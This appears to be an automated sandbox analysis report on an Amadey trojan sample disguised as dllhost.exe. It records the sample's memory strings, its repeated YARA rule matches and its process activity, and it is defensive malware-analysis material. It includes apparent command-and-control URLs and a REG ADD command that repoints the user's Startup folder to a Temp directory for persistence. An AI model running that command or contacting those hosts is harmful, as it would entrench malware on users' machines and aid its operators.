              Source: dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1
              Source: dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1#
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008C9000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008C9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1G
              Source: dllhost.exe, 00000001.00000003.1986578008.0000000000912000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.php?scr=1RE
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817745095.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpQ
              Source: dllhost.exe, 00000001.00000003.1986592314.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpded
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpncoded
              Source: dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.jsonpost.xyz/sj2vMs/index.phpncodedY
              Source: dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xQ
              Source: dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpo
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1817713247.00000000008F7000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1833879370.00000000008E0000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074699978.0000000000911000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.2074636370.00000000008F2000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.x
              Source: dllhost.exe, 00000001.00000003.1871896347.000000000090A000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php
              Source: dllhost.exe, 00000001.00000003.1775452885.00000000008C0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php(
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php)
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php/
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php:
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php?scr=1
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.php?scr=16H
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpC
              Source: dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpC:
              Source: dllhost.exe, 00000001.00000003.1806307598.00000000008F8000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806281208.00000000008F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD
              Source: dllhost.exe, 00000001.00000003.1833879370.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDE
              Source: dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEetCookiesW3
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg3y
              Source: dllhost.exe, 00000001.00000003.1872056759.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEg4y
              Source: dllhost.exe, 00000001.00000003.1817745095.000000000088D000.00000004.00000020.00020000.00000000.sdmp, dllhost.exe, 00000001.00000003.1806321286.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpD5A8D8D892DAAFDEs
              Source: dllhost.exe, 00000001.00000003.1833860453.00000000008F7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpR
              Source: dllhost.exe, 00000001.00000003.1871951511.00000000008F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpg
              Source: dllhost.exe, 00000001.00000003.2074756510.000000000088D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpgW
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/index.phpv
              Source: dllhost.exe, 00000001.00000003.1776075882.00000000008E0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.xmlpost.xyz/sj2vMs/inl

              System Summary

              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.2.S7AGd447vH.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.914800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2263e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.634800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2243e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 1.3.dllhost.exe.2204848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 0.3.S7AGd447vH.exe.2224848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.2.dllhost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22283e58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 7.3.dllhost.exe.22244848.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000001.00000003.1748937794.0000000000600000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000002.1708549958.0000000000428000.00000004.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000002.1708442500.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1819904387.0000000022241000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000000.00000003.1704095067.0000000000910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000007.00000002.1820165445.0000000000428000.00000004.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000007.00000002.1820138863.0000000000401000.00000020.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000007.00000003.1818805602.0000000000630000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000000.00000003.1704876629.0000000002221000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_7abb059b Author: unknown
              Source: 00000001.00000003.1749767253.0000000002201000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: S7AGd447vH.exe PID: 7524, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: dllhost.exe PID: 7608, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: Process Memory Space: dllhost.exe PID: 7856, type: MEMORYSTRMatched rule: Windows_Trojan_Amadey_c4df8d4a Author: unknown
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE42233 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,GetModuleHandleA,GetProcAddress,0_2_7FE42233
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: 0_2_7FE422AA NtQueryInformationProcess,0_2_7FE422AA
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE42233 GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,GetModuleHandleA,GetProcAddress,7_2_7FE42233
              Source: C:\Users\user\AppData\Local\Temp\3e5d740863\dllhost.exeCode function: 7_2_7FE422AA NtQueryInformationProcess,7_2_7FE422AA
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: String function: 00411030 appears 39 times
              Source: C:\Users\user\Desktop\S7AGd447vH.exeCode function: String function: 0040FC60 appears 102 times
              Source: S7AGd447vH.exe, 00000000.00000002.1708672598.00000000005CC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704342589.000000002293D000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704573003.000000002266E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704708297.0000000022B42000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCOMBASE.DLLj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000003.1704234456.0000000022787000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs S7AGd447vH.exe
              Source: S7AGd447vH.exe, 00000000.00000000.1663041864.0000000000464000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamedllhost.exej% vs S7AGd447vH.exe
              Source: S7AGd447vH.exeBinary or memory string: OriginalFilenamedllhost.exej% vs S7AGd447vH.exe
              Source: S7AGd447vH.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders" /f /v Startup /t REG_SZ /d C:\Users\user\AppData\Local\Temp\3e5d740863\
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2204848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.914800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22244848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.2243e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 0.3.S7AGd447vH.exe.2224848.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 1.3.dllhost.exe.604800.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.22283e58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_7abb059b reference_sample = 33e6b58ce9571ca7208d1c98610005acd439f3e37d2329dae8eb871a2c4c297e, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 686ae7cf62941d7db051fa8c45f0f7a27440fa0fdc5f0919c9667dfeca46ca1f, id = 7abb059b-4001-4eec-8185-1e0497e15062, last_modified = 2021-08-23
              Source: 7.3.dllhost.exe.634800.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Amadey_c4df8d4a reference_sample = 9039d31d0bd88d0c15ee9074a84f8d14e13f5447439ba80dd759bf937ed20bf2, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Amadey, fingerprint = 4623c591ea465e23f041db77dc68ddfd45034a8bde0f20fd5fbcec060851200c, id = c4df8d4a-01f4-466f-8225-7c7f462b29e7, last_modified = 2021-08-23
